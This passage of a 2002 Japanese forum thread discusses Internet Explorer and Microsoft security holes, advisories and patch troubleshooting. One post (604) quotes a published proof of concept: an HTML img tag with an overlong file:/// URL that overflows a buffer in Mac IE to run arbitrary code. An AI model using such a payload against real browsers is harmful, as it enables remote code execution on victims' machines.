ここ見てんのかな? それじゃ 一言わせてね
ヴァ〜〜〜〜〜〜〜〜〜〜〜カ
断りもなしに勝手に公式文書の中身書き換えてバックれんな!
北朝鮮に移転しろ そのほうが社風にあってるぜ

587 :579:02/04/04 21:50
586さん、私にも言わせて!

「世間に発表する前に、ここに相談しに来たら?」
「親切な人が多いから、皆で考えてもらえるかも」







588 :名無しさん@お腹いっぱい。:02/04/04 22:06
最近のMSのパッチ責めで疲れた漏れは
iBook買った
Macはマターリしてていいぞ

589 :名無しさん@お腹いっぱい。:02/04/05 00:11
NetBSD/macppc

590 :名無しさん@お腹いっぱい。:02/04/05 01:33
M$は仕事できないやつが多いんだろうな。

591 :げいつ:02/04/05 02:07
金になることは真剣にやるけど
金にならないことは適当にやる。

文句ある?

592 :名無しさん@お腹いっぱい。:02/04/05 11:08
>>591
何だか中国人みたいだな

593 :名無しさん@お腹いっぱい。:02/04/08 18:44
上げ〜

594 :名無しさん@お腹いっぱい。:02/04/08 21:29
やっと、カーネル・サンダースの呪いの期限が切れた。
阪神は本来、神のチーム。
これくらいのゲームができて当たり前。
1938年に開幕7連勝した時に阪神は優勝した。
今年も9割方優勝する。
阪神電鉄の株価もウナギ昇りだ。
優勝すれば経済効果も核爆弾級だろう。
現在、阪神ファンの脳内モルヒネ分泌量は最高だ。
仕事にも遊びにもハリが出る。
阪神ファンが勝ち味に飢えていたが故に。
カーネル・サンダースは俺たち阪神ファンに17年間の試練を与えた。
今はそのことに感謝したい。
昼食時には是非ともKFCを利用したいと思っている。

595 :名無しさん@お腹いっぱい。:02/04/09 00:01
八方がおかしくなった

596 :名無しさん:02/04/13 16:07
むっしゅムラムラ

597 :今なお2002年2月に公開されたコードの利用に対して脆弱:02/04/13 16:18
「IEの最新の修正プログラムは今なお2002年2月に公開されたコードの利用に対して脆弱」
https://www.netsecurity.ne.jp/article/2/4773.html

598 :名無しさん@お腹いっぱい。:02/04/13 22:00
>>594
マナーが悪い阪神ファンは日本中から
呪われてますが?

599 :MS02-019:02/04/17 11:51
「MS02-019: Internet Explorer for Mac および Office for Mac の未チェッ
クの バッファによってコードが実行される(Q321309)」
特別なHTML エレメントの処理に含まれる脆弱性により、悪意のある ユーザーが
バッファのオーバーラン攻撃 を発生させることができます。
特定のHTML エレメントに含まれる Apple Scripts を実行する脆弱性です。こ
の問題を利用して悪意のあるユーザーがユーザーの許可なしに ローカルのプログ
ラムを実行できる可能性があります。
http://www.microsoft.com/japan/technet/security/bulletin/ms02-019ov.asp

600 :名無しさん@お腹いっぱい。:02/04/17 17:24
600

601 :Mac用IEだからか盛り上がらんね:02/04/17 19:05
Mac版IEとOfficeにセキュリティ・ホール,深刻度は「高」
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20020417/1/

602 :名無しさん@お腹いっぱい。:02/04/17 19:52
もう、どうでもいいや。
そんな特殊な状況に出くわすわけでもなし。


603 :名無しさん@お腹いっぱい。:02/04/17 22:51
ほんと もうどうでもいいって感じだね

604 :Exploit:02/04/18 01:08
Mac版IEとOfficeにセキュリティ・ホール,深刻度は「高」
Exploit:

http://www.securiteam.com/windowsntfocus/5WP0C1P6UA.html

The following HTML file will demonstrate the problem.
We chose to use IMG simply because that is instantly loaded,
but an <A HREF=...> could have been used also.
It can also be viewed (in live form)
at http://www.w00w00.org/files/advisories/ie_sample.html.
It overwrites the saved link register that is used for
a subroutine's return address on PowerPC.
This will allow remote execution of arbitrary code.
The saved link register is overwritten by the 0x41424344.
This vulnerability will allow up to 1313 characters
before the saved link register. Pure binary data (including NUL bytes)
can be used by escaping it (i.e., A as %41).
However, using "%41" will count as three characters,
rather than just one. NOTE: By character, we mean uni-byte characters.

<html>
<body>
<img src=file:///[1313 characters]%41%42%43%44>
</body>
</html>


605 :名無しさん@お腹いっぱい。:02/04/18 10:26
age

606 : :02/04/18 22:09
IEに新たなセキュリティーホール:「戻る」ボタンで攻撃開始?
http://headlines.yahoo.co.jp/hl?a=20020418-00000001-wir-sci

607 :名無しさん@お腹いっぱい。:02/04/18 23:45
こりゃまた扇動的な見出し付けたもんだなヤフーは

608 : :02/04/19 09:22
バグありすぎ。。。。

609 :ひよこ名無しさん:02/04/19 21:47
>>606
どうしても「戻る」ボタンで戻らないといけない場合、
どうすればいいんでしょうか?回避法とかないんですか?

610 :名無しさん@お腹いっぱい。:02/04/19 21:54
>>609
ひよこに帰れよ

611 :名無しさん@お腹いっぱい。:02/04/20 19:09
最近ネスケにしたよ。
ネスケも穴あるけど、なんたってマイナーだからな。(w


612 :名無しさん@お腹いっぱい。:02/04/20 19:12
ネスケって重くない?

613 :名無しさん@お腹いっぱい。:02/04/20 19:38
手術ラよりは軽い

614 :名無しさん@お腹いっぱい。:02/04/20 20:14
>手術ラよりは軽い

ぁ、、オペラかょ! (しばらく考えた)

ネスケなら、4.78 でいいだろ?

615 : :02/04/20 20:38
普段6.0だが4.78でもいいかも。動的に再描画してくれないけどな。

616 :名無しさん@お腹いっぱい。:02/04/20 23:27
>>615
http://www.vector.co.jp/soft/win95/net/se208587.html
これはどうかな?

617 :名無しさん@お腹いっぱい。 :02/04/22 12:54
現在作業中であった場合は情報が失われました、
て頻繁に出るんだけどなんで

618 :名無しさん@お腹いっぱい。:02/04/22 13:08
>>617 セキュリティと関係ないよ。
IEが壊れてる(修復しろ)か他のアプリと干渉して不安定になっているか
だろう。
パソコン初心者@2ch掲示板
http://pc.2ch.net/pcqa/ へ。

619 :名無しさん@お腹いっぱい。:02/04/23 19:53
穴がありすぎて既にどれをふさいだのか把握できてないみょ

620 : :02/04/24 14:32
>>617
俺も増えたように感じる。前はほとんど(数ヶ月に一度)お目にかから
なかったのに、今は数日に一度。Q319182当ててからかな、、?
出るときは複数のIEの窓を開いていて、一つの窓を閉じた時が多い
感じがする。関係ないかもしれないけど。
もっとも618の言うようなことかもしれないけどね。

621 :名無しさん@お腹いっぱい。:02/04/30 07:32
>>509
オレも、TweakUIでショートカットアイコンの矢印を薄くしてたんだけど、
最近、"Windows Update"を実行したら、普通の矢印になっちまったよ。
早く直してくれ。普通の矢印、嫌いなんで、うっとうしいんだよな。

622 :名無しさん@お腹いっぱい。:02/04/30 09:13
test

623 :セキュリティホール情報:02/05/02 19:22
<Microsoft>
▽ Internet Explorer/Outlook
Internet Explorer 6.0とOutlook 6.0でXBMグラフィック・ファイルの使用を
許可しているため、HTMLやメールに 含まれるIMGタグで呼び出すことが可能な
る。このとき、呼び出されたが画像のサイズがチェックされないた め、大量のメ
モリを消費させることが可能になる。
ttps://www.netsecurity.ne.jp/article/6/5022.html

SecurePoint
IE/OE6.0 cannot handle malformed XBM files
http://msgs.securepoint.com/cgi-bin/get/bugtraq0204/329.html

624 :名無しさん@お腹いっぱい。:02/05/04 14:40
SNMP サービスに含まれる未チェックのバッファにより、任意のコードが
実行される (MS02-006)

このセキュリティ情報の対象となるユーザー : 簡易ネットワーク管理プロトコ
ルを使用して Microsoft(R) Windows(R) 95、98、98SE、Windows NT(R) 4.0、
Windows 2000 または Windows XP システムを管理しているシステム管理者

推奨する対応策 : Windows 2000 および Windows XP の SNMP を使用しているお
客様はこの修正プログラムを適用して下さい。そのほかのお客様は、SNMP サー
ビスを実行している場合、サービスを無効にして下さい。また、修正プログラム
が入手可能となりましたら、修正プログラムを適用して下さい。

影響を受けるソフトウェア :
・ Microsoft Windows 95
・ Microsoft Windows 98
・ Microsoft Windows 98SE
・ Microsoft Windows NT 4.0
・ Microsoft Windows NT 4.0 Server, Terminal Server Edition
・ Microsoft Windows 2000
・ Microsoft Windows XP

625 :名無しさん@お腹いっぱい。:02/05/04 14:41
・ よく寄せられる質問 : マイクロソフトセキュリティ情報(MS02-006)
http://www.microsoft.com/japan/technet/treeview/default.asp?url=/japan/technet/security/bulletin/fq02-006.asp

どのように SNMP サービスを無効にするのですか?
使用中のシステムに次の手順を行って下さい。

Windows 95、98 および 98SE :
[コントロール パネル] で [ネットワーク] をダブルクリックします。
[構成] タブで、インストールされているコンポーネントの一覧から [Microsoft SNMP エージェント] を選択します。
[削除] をクリックします。
次のキーをチェックし、snmp.exe がリストされていないことを確認して下さい。
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run


↑98SEは[構成] タブなんかないぞ( ゚Д゚)ゴルァ!!
SNMP サービスってよく分からないしシステム管理者でもないんですが、
やっぱりパッチを当てるなりサービスを無効にしたほうがいいですよね?

626 :名無しさん@お腹いっぱい。:02/05/04 18:23
>>625
確かにないね。検索するとexeはあるけどね。
とりあえずヘルプ→バージョン情報でQ319182があれば
しばらく何も考えないほうがいいと思われ。

そうそう。もうこの状況に疲れたら
Operaとか、他のブラウザをインストールしておいたほうがいいよ。
つーか、IEが2ndになってしまった漏れ(w

627 :名無しさん@お腹いっぱい。:02/05/04 21:20
http://www.microsoft.com/japan/technet/security/bulletin/ms02-006.asp?frame=true

98SEユーザーなんですが98用の「314147JPN8.EXE」をインストするんでしょうか?
それとも今回は待ちなんでしょうか?
はっきり言って難しい説明はいらないからこれにはこのパッチを入れろと
分かりやすく書け、ゲイツ!

628 :名無しさん@お腹いっぱい。:02/05/04 21:43
>分かりやすく

わ・か・り・や・す・く

>>627
これでいいか?

629 :名無しさん@お腹いっぱい。:02/05/04 21:44
>>627のレベルを想像するに、コンパネ→ネットワークにSNMPサービスがあれば削除。
これだけすればインストールの必要なし。


630 :名無しさん@お腹いっぱい。:02/05/06 21:07
ショートカットの矢印や共有アイコンの変更ができなくなった点については
直してもらえる見込みはあるのだろうか。
それともこのまま、変更できないのが「仕様」ということになってしまうのか?

ダサダサの矢印はまだいい。問題は、共有設定のあの気色悪い手のアイコンだ。
漏れはCDドライブを共有しているのだが、ゲームCDの可愛らしい美少女アイコンが
イヤラシイ男の手でおおわれて・・・うおおおお(血涙)!!!

631 :名無しさん@お腹いっぱい。:02/05/06 21:45
( ゚д゚)ポカーン

632 :名無しさん@お腹いっぱい。:02/05/09 01:15
襟裳岬

633 :MS02-022:02/05/09 16:37
『MSN Messengerに深刻なホール,すべてのIEユーザーは対策を』
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20020509/1/
影響を受けるのは,MSNチャットコントロールを含むMSN MessengerやExchange
Instant Messenger。ただし,Messengerなどを使用していなくても,意識せずに
チャッ トコントロールをインストールしている場合が十分ありうるので,すべて
のInternet Explorer(IE)ユーザーが対策を施す必要がある。セキュリティ・
ホール情報と同時に 公開されたパッチ(修正プログラム)を適用すれば影響を回
避できる。

http://pc.2ch.net/test/read.cgi/sec/1020794446/21

634 :名無しさん@お腹いっぱい。:02/05/09 18:20
age

635 :cheshire-cat:02/05/09 18:28
某所で「IEのパッチ未リリースのセキュリティホール一覧」みたいなリストがあった。
んで、それがほとんどJavaScriptがらみ。

ちゅうか。
漏れジャバスクはMSに繋ぐ時を除き、必ず切ってるが。

IE6SP1期待AGEの会と併せて、<ジャバスク強要サイトに「CGI使えやこら!」ってメル送る会」、作りませんか?

636 :名無しさん@お腹いっぱい。:02/05/09 20:49
CGIはどこでも使えるわけじゃないからねぇ
まぁなくても大差ないようなJavaScriptは勘弁とも思ふ

637 :cheshire-cat:02/05/09 21:35
>>636
仕事で使うオンラインカタログが、ジャバスク強要で。
かなり嫌。
自社鯖のくせに、みたいな。

638 :名無しさん@お腹いっぱい。:02/05/10 16:54
>>635
JavaScriptとCGIの機能的な限界の差異の分からない人が、
でしゃばーた真似するな。

639 :パッチ当てろよ!:02/05/10 17:14
『MSN Messengerに深刻なホール,すべてのIEユーザーは対策を』
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20020509/1/
影響を受けるのは,MSNチャットコントロールを含むMSN MessengerやExchange
Instant Messenger。ただし,Messengerなどを使用していなくても,意識せずに
チャッ トコントロールをインストールしている場合が十分ありうるので,すべて
のInternet Explorer(IE)ユーザーが対策を施す必要がある。セキュリティ・
ホール情報と同時に公開されたパッチ(修正プログラム)を適用すれば影響を回
避できる。

640 ::02/05/10 18:03
関係ないケドMS重いんだけど・・・・
気のせいやったらスマソ

641 :名無しさん@お腹いっぱい。:02/05/10 20:16
メッセンジャーのパッチってどれ?
新しいバージョンをインストールしたらいいの?

642 :名無しさん@お腹いっぱい。:02/05/10 21:39
この問題に対する日本語版修正プログラムは、次のサイトからダウンロードできます。
http://www.microsoft.com/Downloads/Release.asp?ReleaseID=38790
↓その中身がこれ
Microsoft MSN Chat (MSN チャット)
http://download.microsoft.com/download/chat/Patch/4.1/W98XP/EN-US/MSNChatSecFix.exe


アップデートされたソフトウェアのバージョンは、次のサイトからダウンロードできます。
MSN チャット コントロールのアップデートされたバージョンのダウンロード先 :
http://chat.msn.co.jp
修正されたコントロールを含む MSN Messenger のアップデートされたバージョンのダウンロード先 :
http://messenger.msn.co.jp/download/download.asp?client=1&update=1
修正されたコントロールを含む Exchange Instant Messaging サービス のアップデートされたバージョンのダウンロード先 :
http://www.microsoft.com/Exchange/downloads/2000/IMclient.asp
ダウンロード先のリストから 「Japanese」 を選択して下さい。


上のパッチを当てて、下の新しいメッセンジャーソフトを入れるのが無難かもね。

643 :名無しさん@お腹いっぱい。:02/05/10 21:51
>>638
しかしMSDNくらいJavaScript使い倒しで使いやすくしてるページなら許すけど、
どーでもいいページでJavaScriptを強制されるほど腹の立つことは無い。んなページ見ないけどな。(w

644 :cheshire-cat:02/05/10 21:55
>>638
特定の条件が揃うと、ブラウザクラッシャー状態になるとこなんで、とっても困ってるんですが。
不良セクタできましたし。

645 :名無しさん@お腹いっぱい。:02/05/10 21:57
>>644
不良セクタは関係ない。

646 :cheshire-cat:02/05/10 22:10
>>645
電源強制カットするしかなかったんですが。

647 :名無しさん@お腹いっぱい。:02/05/10 22:17
ブラクラ程度ならCTRL-ALT-DELで止まらんか? ネットワークケーブル引っこ抜いても良いし。
つーか、止められないのに出会ったこと無い。

648 :cheshire-cat:02/05/10 22:25
>>647
いきなりブルークラッシュだったんだけど。
何が起こったのか理解できなかった、一瞬。

メールしたら、「対応ブラウザでご利用ください」、なんてレスが来たし。

とりあえずソース欲しかったんで、MACで保存しときました。

649 :名無しさん@お腹いっぱい。:02/05/10 22:30
URLプリーズ

650 :cheshire-cat:02/05/10 22:41
>>649
内緒(らぶ
今度暇ができたら、ぽちぽち遊びます。

651 :名無しさん@お腹いっぱい。:02/05/11 22:33
HISTORYフォルダ下のindex.datについて詳しいサイトないっすか?

なんかIEとは関係ないものまで現れるんですけど…。
(ちなみにIEは4です、すいまそん)

652 :名無しさん@お腹いっぱい。:02/05/14 10:31
User-Agent に Q312461 または T312461 の文字列のない IE は
パッチを当ててないか偽装 UA のどちらかと断定してしまっていいですか?
偽装 UA のかなりの部分がロボット(それもメールアドレス収集とかの
あやしげなもの)の気配が濃厚なんで、偽装でないものも含めて
MS のページにリダイレクトするよう Web サーバを設定してやりたいんだけど。

最近出荷された PC にプレインストールされた IE はパッチ済みだけど
この文字列がない、とかいうことがあれば考えなおさなきゃならんので
教えてください。

653 : :02/05/14 10:48
>>652
IEにパッチを入れなればそういう文字列が出ないだけで、それはユーザが
入れてないだけのこと。
それにその2種類以外だってあるのだし。
UAの偽装を見破ることは無理。

654 :名無しさん@お腹いっぱい。:02/05/14 11:56
>>653
そんなこと百も承知で疑わしい奴はMSに飛ばしちまおうというんだろ。
しかし、パッチ済みでUAにパッチIDの無い奴があったらまずいのでそれを知りたいというのが>>652
もうちっと、読解力つけろや。

655 : :02/05/14 12:08
>>654
だから無理だって言ってんじゃないの

656 :名無しさん@お腹いっぱい。:02/05/14 12:55
つまり、出る杭は打たれて根元を曲げちゃって親方に怒られるって事だね?

657 : :02/05/14 18:34
関連スレッド:メーラーの視点で

OE(又はIEコンホ?ーネント使用メーラー)の問題点とその対策方法
http://pc.2ch.net/test/read.cgi/sec/1021137509/

658 :652:02/05/14 21:59
>>655
どんな場合に無理なのか具体例を教えていただきたく。
UA の偽装を100%見破ることは目的ではない。セキュ穴をふさいだのに
パッチ ID が UA にあらわれない場合があるのかどうかが知りたいだけ。

↓UA をパッチなし IE に偽装したロボットによるアクセスの実例
eng002.goo.ne.jp - - [14/May/2002:12:43:20 +0900] "GET / HTTP/1.1" 200 42633 "" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)"

goo 逝ってよし。

659 :名無しさん@お腹いっぱい。:02/05/16 14:37
MS02-023 出ますた。Windows Update でも可能。
http://www.microsoft.com/japan/technet/treeview/default.asp?url=/japan/technet/security/bulletin/ms02-023ov.asp

いいかげん何とかしてくれ↓
Q312461; Q313675; Q316059; q319182; Q321232;

660 :名無しさん@お腹いっぱい。:02/05/16 14:52
>>658
単にロボット対策すればいいだけじゃないの?

661 :名無しさん@お腹いっぱい。:02/05/16 14:55
>>660
robots.txt や <mata name="ROBOTS"> を解釈してくれるような
まともなロボットは UA の偽装なんてしません。

662 :名無しさん@お腹いっぱい。:02/05/16 14:59
>>661
対策の仕方をそれしか知らないだけだろ。
Web制作板へどうぞ

663 :名無しさん@お腹いっぱい。:02/05/16 15:23
>>658
偽装がないという前提で、まったくパッチを当てなければ表示されないが、
当てていても表示され方は様々。
パッチが出るたびに適用すればいくつも表示されるし、過去のパッチを
包括したものだけを適用すれば少ししか表示されない。
いずれかのパッチを適用していないアクセスが自分のサイトに悪影響を
及ぼすと考えてセキュ穴と言ってるのなら、該当するパッチの表示が
ないものをリダイレクトすればいい。

ちなみに私のは>>659さんと同じ5つです。

664 :名無しさん@お腹いっぱい。:02/05/16 17:32
>>663
どんなにパッチを当てていても、*User-Agent* には 312461 しか出ないよ。

665 :名無しさん@お腹いっぱい。:02/05/16 18:37
ダメだ、マイクロソフトが落ちてるっぽい。


666 : :02/05/16 19:48
http://jscript.dk/adv/TL002/
// Expected to return an array of <link> elements.
// theDocument variable used in this line is the document property of the
// argument sent to the dialog, an expected window object.
links = theDocument.all.tags("link");

// Sends the array for inspection by another function
retVal = checkLinkReadyStateComplete(links, reportLocation);

if(objects==null)
returnretVal;
for(i=0;i<objects.length;i++){
element=objects(i);
if(element.rel.toLowerCase()=="stylesheet"
||element.rel.toLowerCase()=="alternatestylesheet")
{
if(element.readyState!="complete"&&element.readyState!=4){
reportLocation.insertAdjacentHTML("BeforeEnd",L_StyleSheetNotInstalled_Text+element.href+"<BR><hr>");
retVal=true;
}
}
}


667 :名無しさん@お腹いっぱい。:02/05/17 09:17
累積パッチ上げ入れようぞ

668 :名無しさん@お腹いっぱい。:02/05/17 09:37
>>659
Q306121が抜けてるやん

669 :名無しさん@お腹いっぱい。:02/05/17 12:52
>>668
累積パッチって、一度に複数の修正を適用するとそのうちひとつしか
表示されないんじゃないかな? ほんとかどうかは知らんけど。
うちで最近新規インストールしたWin2k+IE5.5は、バージョン情報を見るかぎり
Q312461が入ってないけど、User-AgentにはT312461が入ってる(w

670 :名無しさん@お腹いっぱい。:02/05/17 15:15
昨夜パッチあてたけど、再起動したらアップデートに失敗しましたと表示された。
もう一度、MSに確認したら、インストされた事になってた。

IE6 q319182; Q321232; 

こんな状態です、大丈夫ですか

671 :名無しさん@お腹いっぱい。:02/05/17 15:31
>>670 OSは?

672 :670:02/05/17 15:44
>>671
言いにくいんですが、メモ帳です。
どうでしょう?

673 :名無しさん@お腹いっぱい。:02/05/17 15:59
>>672
偽者ウゼー

Meです >>671

674 :名無しさん@お腹いっぱい。:02/05/17 16:05
どうやらWinME + IE6 + Q321232はパッチ当てるときに不安定のようだね。
結果的にはパッチは当たっているようだが。

675 :670:02/05/17 16:09
>>673
本物ウゼー

Weです>>671

676 :●000 ◆100seccQ :02/05/17 16:55
>>675
なに一生懸命煽ってるの?馬鹿ちゃうか〜

>>674
アドバイスありがとうです

677 :名無しさん@お腹いっぱい。:02/05/17 17:03
マイクソロフト
俺もQ321232入れますた。バージョン情報見たら、ちゃんと追加されてた。
でも診断くんでみたらQ312461だった
よく分からんしまぁいいや・・・。

678 :名無しさん@お腹いっぱい。:02/05/17 22:38
ちょっと冷え込んできたので、パッチをあてます。

679 :名無しさん@お腹いっぱい。:02/05/18 01:05
MSのパッチを知った頃は神経質なくらい調べまくって
チェックしていたが、近頃はメールで知らせてくれたものだけ当てている。
性格がMSみたいに雑になってきた。


680 :名無しさん@お腹いっぱい。:02/05/18 01:34
>>677
アッ 折れもだ!!

681 :名無しさん@お腹いっぱい。:02/05/18 03:44
個人情報ってなに?どんなことなの?

682 :名無しさん@お腹いっぱい。:02/05/18 11:03
>>679
確かに面倒い。
ホントならIE6SP1とか出してもらって一括で修正したいんだけど
あんまり頻繁に脆弱性が見つかるもんで
MSもリリースのタイミングが取れないんだろうね。

683 :Meです:02/05/18 12:08
Q321232 : セキュリティ問題の修正プログラム (Internet Explorer 6) - version 6,0,2716,2300 - のインストールに失敗しました。
16:25:49 2002年5月16日 : 5383

Q321232 : セキュリティ問題の修正プログラム (Internet Explorer 6) - version 6,0,2716,2300 - のインストールに失敗しました。
16:26:46 2002年5月16日 : 5383

Q321232 : セキュリティ問題の修正プログラム (Internet Explorer 6) - version 6,0,2716,2300 - のインストールが完了しました。
16:36:37 2002年5月16日 : 5383




684 :名無しさん@お腹いっぱい。:02/05/18 16:02
>>683
俺も

685 :一度ダウンロードしては?:02/05/18 16:39
>>683 

686 :三度ダウンロードしました!:02/05/18 17:00
>>685

687 :名無しさん@お腹いっぱい。:02/05/18 17:13
ie6のmeだけど問題なくあてれたよ。

688 :一度「保存」してから実行!:02/05/18 17:21
でイケルのでは?

689 :名無しさん@お腹いっぱい。:02/05/19 00:02
WinMe/IE6 です。
今まですべて当ててるはずですが
q319182; Q321232; となってます。

ヤヴァイんでしょうか?


690 :名無しさん@お腹いっぱい。:02/05/19 00:08
sageてしまいました。

691 :名無しさん@お腹いっぱい。:02/05/19 03:05
>>689
私は最初からこまめにアップデートしていました。
環境はWindows Meで使用ブラウザはIE6です。

セキュリティパッチは以下のとおり。
Q306021,Q312461,Q313675,Q316059,q319182,Q321232

累積的なパッチがこの中には含まれているので、>>689さんので
万全かもしれませんが、念のために、こちらのほうでご自身でご
確認ください。

http://www.microsoft.com/japan/enable/products/security/proglist.asp?prod=032&info=13

692 :689:02/05/19 04:47
>>691
有難う。
個別にパッチ当てていましたが、累積パッチが出たらまた上から当ててました。

了解です、確認してみます。

693 :名無しさん@お腹いっぱい。:02/05/19 15:18
>>691
q313829は?

それと
またこのソフトウェアアップデートを実行すると、
修正プログラムに加えて、「制限付きサイト」のデフォルト設定を「すべてのフレームをブロックする」に制限する新しい“機能”が追加される。
ってあるんだけど、「すべてのフレームをブロックする」なんていう項目は何処にあるの?
http://www.zdnet.co.jp/news/0205/16/ne00_ie.html

694 :名無しさん@お腹いっぱい。:02/05/28 15:12
EXCELの穴
http://www.zdnet.co.jp/news/0205/28/nebt_01.html
MSセキュリティスレ欲すい

695 :名無しさん@お腹いっぱい。:02/05/28 15:22
>>694 立ててくれ

696 :694:02/05/28 15:32
このスレとOEスレがあるんで、あまり乱立させても分散しちまうから、このスレの次でいいカナと。

697 :名無しさん@お腹いっぱい。:02/05/28 15:36
なるほど

698 :名無しさん@お腹いっぱい。:02/05/28 20:37
【Windows】セキュリティ情報総合スレッド
http://pc.2ch.net/test/read.cgi/pcnews/1014872364/

こんなんあるけど

699 :名無しさん@お腹いっぱい。:02/06/08 09:20
http://pc.2ch.net/test/read.cgi/sec/1021363841/73より転載
IE 5.5/6に深刻なホール,対策はGopherプロトコルを無効にすること

フィンランドのセキュリティ・ベンダー「Oy Online Solutions」は現地時間6月
4 日,Internet Explorer(IE)5.5/6 のセキュリティ・ホールを公表した。Web
ページや HTMLメール中のリンクをクリックすると,ユーザーのパソコン上で任意
のコード(プロ グラム)を実行させられる恐れがある。対策は,IEの設定を変更
してGopherプロトコ ルを無効にすること。パッチは公開されていない。
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20020607/1/

700 :名無しさん@お腹いっぱい。:02/06/08 10:40
>>699
この対策をして127.0.0.1から攻撃されるんですけどと騒ぐPFW厨が出現するに2000ドラクマ

701 :名無しさん@お腹いっぱい。:02/06/08 10:58
>>700 ワラタ

702 :名無しさん@お腹いっぱい。:02/06/10 01:25
オミトロンが使えなくなりましたね。

703 :MS02-027:02/06/12 10:55
>>699 についてMSから公表あり。
MS02-027 に関する情報
「MS02-027: Gopher プロトコル ハンドラの未チェックのバッファにより、
攻撃者の任意のコードが実行される (Q323889)」
http://www.microsoft.com/japan/technet/security/bulletin/ms02-027ov.asp


704 :名無しさん@お腹いっぱい。:02/06/12 18:54
MSからのメールって読んでもいつも意味が分からず
とりあえずパッチ当ててるんですが
今回はどれくらい危険なんですか?

705 :名無しさん@お腹いっぱい。:02/06/12 19:53
>>704 危険度「高」だ。パッチはまだ出てない。そこで回避策を講じる必要
がある。詳細は
http://ime.nu/www.microsoft.com/japan/technet/security/bulletin/ms02-027ov.aspで。

706 :名無しさん@お腹いっぱい。:02/06/14 09:14
WinsockでGopher通らないように設定変更した
MS Proxy2.0の内側にいるIE達も、
設定変更しなきゃダメ?


707 :名無しさん@お腹いっぱい。:02/06/14 10:38
>>706
WinsockでGopher通さないってなんだ?
gopher://xx.xx.xx.xx:80とかポート指定されるてもブロック出来るか?

708 :名無しさん@お腹いっぱい。:02/06/14 12:45
>707
MS-Proxyでは、Winsockをどのプロトコルで有効にするか
設定出来るんだよ


709 : :02/06/14 13:08
そのProxyもMSだからなぁ・・・

710 :MS02-027:02/06/15 16:43
ISA Server 2000、Proxy Server 2.0用の修正プログラムのみ公開された。
Internet Explorer用のは未公開。
http://www.microsoft.com/japan/technet/security/bulletin/ms02-027.asp
・ ISA Server 2000:
http://www.microsoft.com/downloads/release.asp?ReleaseID=39859
・ Proxy Server 2.0:
http://www.microsoft.com/downloads/release.asp?ReleaseID=39864

711 :MS02-027続報:02/06/19 14:40
マイクロソフトが公開した「Gopher問題」の回避方法に誤り
 TCPポート70番のブロックでは防げない,パッチや設定変更で回避
http://itpro.nikkeibp.co.jp/members/ITPro/SEC_CHECK/20020617/1/
>誤った回避策とは,「Gopherプロトコルが使用するTCPポート70番を,
>ファイアウオ ールなどでブロックすること」である。これでは攻撃を防げない
>のである。
IEの設定変更で対処すべし。

英語版のセキュリティ情報は既に修正済み
http://www.microsoft.com/technet/security/bulletin/ms02-027.asp

712 :名無しさん@お腹いっぱい。:02/06/20 09:17
「MS02-027: Gopher プロトコル ハンドラの未チェックのバッファにより、
攻撃者の任意のコードが実行される (Q323889)」
日本語版も訂正完了。
http://www.microsoft.com/japan/technet/security/bulletin/ms02-027.asp
このセキュリティ情報ページを更新し、最初にリリースしたセキュリティ情報の
TCP ポート 70 番のブロックの有効性に関する情報に事実と異なる点があった
ため、削除しました。

Internet Explorer用の修正パッチは未公開。

713 :名無しさん@お腹いっぱい。:02/06/20 10:39
http://www.zdnet.co.jp/news/0206/19/xert_sue.html

714 :名無しさん@お腹いっぱい。:02/06/26 13:38
エラーが見つかったら自分で直せばいいじゃん

715 :名無しさん@お腹いっぱい。:02/06/27 22:56
WMP 修正パッチage
http://www.microsoft.com/japan/technet/security/bulletin/ms02-032.asp

716 :名無しさん@お腹いっぱい。:02/06/28 02:45
WMP6.4と7.1を入れてるんですけど(Win98環境)、
これからはwm320920_71.exeの1ヶだけ当てればWMP関係は全てOKなんですよね?

717 :名無しさん@お腹いっぱい。:02/06/28 02:46
パッチが正常にインストールされたか確認する方法
- Windows Media Player 7.1
C:\Program Files\Windows Media Player (オペレーティング システムが C
ドライブにインストールされている場合) のフォルダに入っている、
wmplayer.exe のバージョンを確認します。確認するには Windows
エクスプローラーから、wmplayer.exe を右クリックし、[プロパティ] を
クリックします。 [バージョン情報] タブをクリックし、ファイルバージョン
が 7.10.0.3068 と表示されていることを確認します。

上記の方法で見るとバージョン情報を見ると 7.10.0.3068なのに、
WMP7.1のヘルプ→バージョン情報を見ると 7.01.00.3055になってる。
パッチはうまく当たったんだろうけどなぜ一致しないんだ?

718 :名無しさん@お腹いっぱい。:02/06/28 09:50
技術的にはダイアログリソースとバージョンリソースは独立だから…
こういう手抜きパッチ作るなよな。

719 :名無しさん@お腹いっぱい。:02/07/03 08:45
「MS02-027」のKnowleage Base公開。
http://www.microsoft.com/JAPAN/support/kb/articles/JP323/8/89.asp

IE向けパッチは遠日公開されたいという気持ちはある。

720 :名無しさん@お腹いっぱい。:02/07/16 16:24
IEのセキュリティを突くようなデモをしているサイトを
教えて欲しいのですが・・・。

721 :名無しさん@お腹いっぱい。:02/07/16 16:50
microsoft

722 :名無しさん@お腹いっぱい。:02/07/17 19:50
Gopherは元々使わないからいいんだけども
パッチが出ないのは気持ち悪いよね。

723 :名無しさん@お腹いっぱい。:02/07/17 21:24
>>720
こんなのとか?(パッチあててる人には関係ないけど)
http://homepage2.nifty.com/m_kamada/javascript/ietest7.htm

724 :名無しさん@お腹いっぱい。:02/07/17 21:29
>>720
あと、こんなの。
http://java-house.jp/~takagi/security/misc/jscript-clipboard/test.html

725 :724:02/07/18 01:30
>>724は別にセキュリティーホールを突いているわけではなかったね。
スンマソ。

726 :名無しさん@お腹いっぱい。:02/07/18 05:11
>>720
http://pc.2ch.net/test/read.cgi/sec/1005185421/l50
↑のスレで紹介されてた↓のサイトの「Windows Security」のコーナーに色々あった。
http://tarikihongandou.shadowpenguin.org/

727 :SMのM:02/07/21 11:54
>>722
次の累積パッチに入れると見た。
次のは全部でいくつセキュリティホールをつぶすのかな。ワクワク

728 :あぼーん:あぼーん
あぼーん

729 :初心者:02/07/21 17:58
IE6の修正プログラムをTechNetからインストールしようとして
自分の機種やOS(w2k)以外のプログラムを誤ってインストールしてしまいました。
そのせいか残りのプログラムがエラーが出てインストールできませんでした。
